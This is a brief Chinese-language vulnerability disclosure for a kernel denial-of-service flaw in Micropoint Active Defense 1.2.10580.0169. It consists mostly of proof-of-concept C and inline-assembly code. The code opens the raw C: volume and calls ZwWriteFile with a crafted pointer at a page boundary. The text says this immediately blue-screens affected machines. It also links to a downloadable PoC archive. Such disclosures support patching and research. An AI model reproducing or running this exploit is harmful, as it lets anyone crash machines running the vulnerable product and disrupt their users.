微点主动防御 1.2.10580.0169 内核拒绝服务漏洞

下面是攻击示例代码,运行此代码后，装有1.2.10580.0169版本微点的机器上将立即蓝屏 HANDLE hdev = CreateFile("\\\\.\\c:" , FILE_READ_DATA | FILE_WRITE_DATA |SYNCHRONIZE , FILE_SHARE_READ | FILE_SHARE_WRITE , NULL , OPEN_EXISTING , 0,0); BYTE Buffer[512]; ULONG btr ; SetFilePointer(hdev , 0 , 0 , FILE_BEGIN); ReadFile(hdev , Buffer , 512 , &btr , 0 ); HMODULE ntdll = LoadLibrary("ntdll.dll"); PVOID pNtWriteFile = GetProcAddress(ntdll, "ZwWriteFile"); ULONG i ; for (i = 0 ; i < 0x7fffd000 ; i +=0x1000) { if (IsBadReadPtr((PVOID)(i - 3) , 1) == FALSE && IsBadReadPtr((PVOID)i , 1 ) == TRUE) { i = i - 3 ; break ; } } PVOID buf = Buffer; LONG stat ; __asm { push 0 push i push 512 push buf push 0 push 0 push 0 push 0 push hdev call pNtWriteFile mov stat , eax } #http://www.sebug.net/local/poc/bsod_mp_x.rar